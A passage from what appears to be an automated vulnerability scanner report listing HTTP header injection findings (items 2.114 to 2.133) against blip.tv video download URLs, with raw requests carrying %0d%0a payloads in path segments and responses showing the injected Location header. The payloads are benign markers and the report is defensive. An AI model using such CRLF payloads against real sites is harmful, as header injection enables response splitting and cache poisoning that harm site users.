2.114. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap163.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5804c%0d%0a532d4bcc642 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5804c%0d%0a532d4bcc642/get/CookingUpAStory-FoodSwap163.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/5804c
532d4bcc642
/get/CookingUpAStory-FoodSwap163.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 314
Date: Thu, 20 Jan 2011 00:38:07 GMT
X-Varnish: 344224386
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/5804c
532d4bcc642/get/Cooki
...[SNIP]...

2.115. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap163.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload df1c2%0d%0a2b7c3d78fd0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/df1c2%0d%0a2b7c3d78fd0/CookingUpAStory-FoodSwap163.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/df1c2
2b7c3d78fd0
/CookingUpAStory-FoodSwap163.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 330
Date: Thu, 20 Jan 2011 00:38:08 GMT
X-Varnish: 1324524791
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/df1c2
2b7c3d78fd0/Cook
...[SNIP]...

2.116. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap163.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f734d%0d%0a484345946d9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/f734d%0d%0a484345946d9 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/f734d
484345946d9

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:08 GMT
X-Varnish: 1248902543
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/f734d
484345946d9"
...[SNIP]...

2.117. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap232.mp3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e6f6e%0d%0aa39ef88da9f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e6f6e%0d%0aa39ef88da9f/get/CookingUpAStory-FoodSwap232.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e6f6e
a39ef88da9f
/get/CookingUpAStory-FoodSwap232.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 314
Date: Thu, 20 Jan 2011 00:38:11 GMT
X-Varnish: 1025264601
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e6f6e
a39ef88da9f/get/Cooki
...[SNIP]...

2.118. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap232.mp3

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 979b1%0d%0aec06ebaac61 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/979b1%0d%0aec06ebaac61/CookingUpAStory-FoodSwap232.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/979b1
ec06ebaac61
/CookingUpAStory-FoodSwap232.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 330
Date: Thu, 20 Jan 2011 00:38:11 GMT
X-Varnish: 1274879521
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/979b1
ec06ebaac61/Cook
...[SNIP]...

2.119. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap232.mp3

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ac814%0d%0a304968691f9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/ac814%0d%0a304968691f9 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/ac814
304968691f9

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:11 GMT
X-Varnish: 1025264681
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/ac814
304968691f9"
...[SNIP]...

2.120. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap596.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 74695%0d%0aea4dd8038a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /74695%0d%0aea4dd8038a4/get/CookingUpAStory-FoodSwap596.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/74695
ea4dd8038a4
/get/CookingUpAStory-FoodSwap596.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 314
Date: Thu, 20 Jan 2011 00:38:10 GMT
X-Varnish: 344224694
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/74695
ea4dd8038a4/get/Cooki
...[SNIP]...

2.121. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap596.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 42054%0d%0ab24829df45f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/42054%0d%0ab24829df45f/CookingUpAStory-FoodSwap596.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/42054
b24829df45f
/CookingUpAStory-FoodSwap596.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 315
Date: Thu, 20 Jan 2011 00:38:10 GMT
X-Varnish: 2146043279
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/42054
b24829df45f/Cook
...[SNIP]...

2.122. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap596.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 29061%0d%0a8022a006d5c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/29061%0d%0a8022a006d5c HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/29061
8022a006d5c

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:10 GMT
X-Varnish: 1025264548
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/29061
8022a006d5c"
...[SNIP]...

2.123. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 104a2%0d%0ad76efe8bd52 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /104a2%0d%0ad76efe8bd52/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/104a2
d76efe8bd52
/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1025264729
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/104a2
d76efe8bd52/get/Cultu
...[SNIP]...

2.124. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b6af5%0d%0a4acb56fedf4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/b6af5%0d%0a4acb56fedf4/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/b6af5
4acb56fedf4
/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 354
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1324525344
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/b6af5
4acb56fedf4/Cult
...[SNIP]...

2.125. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload aeabe%0d%0a59444e21260 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/aeabe%0d%0a59444e21260 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/aeabe
59444e21260

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 344225052
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/aeabe
59444e21260"
...[SNIP]...

2.126. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fdaab%0d%0af1c4247ece4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fdaab%0d%0af1c4247ece4/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/fdaab
f1c4247ece4
/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1248903057
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/fdaab
f1c4247ece4/get/Cultu
...[SNIP]...

2.127. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload db0fc%0d%0ab371a187941 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/db0fc%0d%0ab371a187941/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/db0fc
b371a187941
/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 354
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1025264774
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/db0fc
b371a187941/Cult
...[SNIP]...

2.128. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 24c8e%0d%0af60a3682fcd was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/24c8e%0d%0af60a3682fcd HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/24c8e
f60a3682fcd

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:12 GMT
X-Varnish: 1248903142
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/24c8e
f60a3682fcd"
...[SNIP]...

2.129. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c4f43%0d%0a19dac7572a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c4f43%0d%0a19dac7572a7/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/c4f43
19dac7572a7
/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 335
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 1498216432
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c4f43
19dac7572a7/get/Puddi
...[SNIP]...

2.130. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload db24f%0d%0ab3adc277396 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/db24f%0d%0ab3adc277396/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/db24f
b3adc277396
/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 1248904942
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/db24f
b3adc277396/Pudd
...[SNIP]...

2.131. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 268a9%0d%0ad1cf5597a15 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/268a9%0d%0ad1cf5597a15 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/268a9
d1cf5597a15

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:25 GMT
X-Varnish: 1498216515
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/268a9
d1cf5597a15"
...[SNIP]...

2.132. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e7343%0d%0a7f7c99de346 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e7343%0d%0a7f7c99de346/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e7343
7f7c99de346
/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 335
Date: Thu, 20 Jan 2011 00:38:27 GMT
X-Varnish: 2146045596
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e7343
7f7c99de346/get/Puddi
...[SNIP]...

2.133. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 15aac%0d%0aed07c2899be was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/15aac%0d%0aed07c2899be/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/15aac
ed07c2899be
